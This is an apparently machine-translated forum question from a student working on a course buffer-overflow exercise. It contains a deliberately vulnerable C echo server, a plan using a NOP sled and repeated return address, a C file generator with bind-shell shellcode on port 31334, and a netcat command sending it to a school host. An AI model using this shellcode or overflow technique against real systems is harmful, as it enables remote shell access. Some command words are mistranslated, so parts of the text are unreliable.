是为了课堂作业。我有点卡住了,我只有一些问题可以帮助我继续前进。(对我来说不要作弊:p)我认为本科班的残酷作业......
我们应该做的:
数控 compName.cs.myschool.edu 9050
如果我们键入一些内容然后按 Ctrl+D,就会有服务器在监听/回显。我们需要使用该输入来破解服务器程序并创建一个具有 sudo 权限的帐户。
以下是相关代码:
int main(int argc, char const *argv[])
{
char input[1000];
int sockfd, newsockfd, portno, clilen, val = 1;
struct sockaddr_in serv_addr, cli_addr;
// some server code that I don't understand but probably isn't super relevant
dup2(newsockfd, 0); // bind stdin
dup2(newsockfd, 1); // bind stdout
dup2(newsockfd, 2); // bind stderr
bufferCopy( input, 0x1000, stdin );
printf("You entered: %s\n", input );
close(newsockfd);
close(sockfd);
return 0;
}
void bufferCopy( char * input, int inputLen, FILE * file )
{
int i = 0;
int c = 0;
while( (c = fgetc( file )) != EOF && i < inputLen - 2 )
{
input[i++] = c;
}
input[i] = 0;
}
更新: 我知道我需要做什么:
- 无操作雪橇(一堆 0x90)
- 其次是端口绑定shellcode(来自书)
- 后面跟着返回地址(“输入”变量的地址)重复了一堆
更新: 我在做什么:
- 我使用以下代码编写文件。
猫攻击代码 | 数控 compName.cs.myschool.edu 9090
static const int NUM_NOPS = 800; static const char NOP = 0x90; static const int NUM_ADDRESSES = 800; static char nopSled[800]; char shellcode[] = { // on port 31334 == 0x7a66 "\x6a\x66\x58\x99\x31\xdb\x43\x52\x6a\x01\x6a\x02\x89\xe1\xcd\x80" "\x96\x6a\x66\x58\x43\x52\x66\x68\x7a\x66\x66\x53\x89\xe1\x6a\x10" "\x51\x56\x89\xe1\xcd\x80\xb0\x66\x43\x43\x53\x56\x89\xe1\xcd\x80" "\xb0\x66\x43\x52\x52\x56\x89\xe1\xcd\x80\x93\x6a\x02\x59\xb0\x3f" "\xcd\x80\x49\x79\xf9\xb0\x0b\x52\x68\x2f\x2f\x73\x68\x68\x2f\x62" "\x69\x6e\x89\xe3\x52\x89\xe2\x53\x89\xe1\xcd\x80" }; static const char returnAddress[] = {0xbf, 0xff, 0xf4, 0x40}; int i=0; for(i=0; i < NUM_NOPS; i++){ nopSled[i] = NOP; } FILE * pFile; pFile = fopen("attackCode", "w"); fwrite( nopSled, 1, sizeof(nopSled), pFile ); fwrite( shellcode, 1, 92, pFile ); for(i=0; i < NUM_ADDRESSES; i++ ){ fwrite( returnAddress, 1, 4, pFile ); } fclose(pFile);
更新: 我不明白的是:
- 返回指针在内存中的位置......我怎样才能找到这个?
- ^ 因此无操作部分需要多长时间,或者重复返回地址的次数
- “输入”的地址是什么——从 printf(%p) 和 gdb 获取不同的值
- 为什么我什么都没有发生……如果我写了很多无操作等,甚至没有段错误。
任何帮助将不胜感激!